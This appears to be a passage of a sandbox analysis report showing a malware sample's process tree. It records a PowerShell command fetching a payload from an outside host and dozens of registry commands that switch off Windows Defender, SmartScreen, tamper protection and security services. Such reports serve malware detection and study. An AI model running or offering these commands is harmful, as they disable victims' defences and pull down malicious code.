      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 3 127.0.0.1
          - Runs ping.exe
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\main.bat" "3⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('http://xuiklxus.xyz/hfile.bin', 'hfile.bin')"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\7za.exe7za.exe x -y -p1234 "*.7z"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\ConsoleApp\ControlSet003.vbs"4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\ControlSet001.bat" "5⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleDay" /t reg_DWORD /d "8" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleTime" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "AdditionalActionTimeOut" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "CriticalFailureTimeOut" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "NonCriticalTimeOut" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableGenericRePorts" /t reg_DWORD /d 1 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v "FirstAuGracePeriod" /t reg_DWORD /d "0" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "DisableUpdateOnStartupWithoutEngine" /t reg_DWORD /d 1 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleDay" /t reg_DWORD /d 8 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleTime" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "SignatureUpdateCatchupInterval" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t reg_SZ /d "Anywhere" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d 1 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v "HideSystray" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f6⤵
- Modifies Windows Defender notification settings
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f6⤵
- Modifies Windows Defender notification settings
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /t reg_BINARY /d "030000000000000000000000" /f6⤵
-
C:\ProgramData\ConsoleApp\kernel32.exekernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f9⤵
-
C:\ProgramData\ConsoleApp\kernel32.exekernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f9⤵
-
C:\ProgramData\ConsoleApp\kernel32.exekernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f9⤵
-
C:\ProgramData\ConsoleApp\kernel32.exekernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f8⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f9⤵
-
C:\ProgramData\ConsoleApp\kernel32.exekernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f7⤵
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f9⤵
-
C:\ProgramData\ConsoleApp\kernel32.exekernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f9⤵
- Modifies security service
-
C:\ProgramData\ConsoleApp\kernel32.exekernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f9⤵
- Modifies security service
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
-
C:\ProgramData\ConsoleApp\kernel32.exekernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f9⤵
-
C:\ProgramData\ConsoleApp\kernel32.exekernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f9⤵
-
C:\ProgramData\ConsoleApp\kernel32.exekernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f7⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f8⤵
-
